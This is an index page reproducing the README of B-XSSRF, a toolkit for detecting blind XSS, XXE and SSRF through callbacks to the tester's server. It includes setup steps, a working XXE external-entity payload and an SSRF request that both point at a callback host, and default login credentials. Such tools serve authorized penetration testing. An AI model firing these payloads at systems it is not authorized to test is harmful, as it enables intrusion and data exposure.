Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/SpiderMate/B-XSSRF

Toolkit to detect and keep track on Blind XSS, XXE & SSRF
https://github.com/SpiderMate/B-XSSRF

Last synced: 7 days ago
JSON representation

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

Lists

README

        




B-XSSRF


B-XSSRF


Toolkit to detect and keep track on Blind XSS, XXE & SSRF











B-XSSRF

### SETUP
- Upload the files to your server.
- Create a Database and upload database.sql file to it.
- Change the DB Credentials in db.php file.
- Ready.

### USAGE
BLIND XSS

```

```
BLIND XXE

```
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
```
SSRF

```
GET /testssrf.php=http://mysite.com/bxssrf/request.php

```
### DEFAULT CREDENTIALS
```
USER : [email protected]
PASS : 123456
```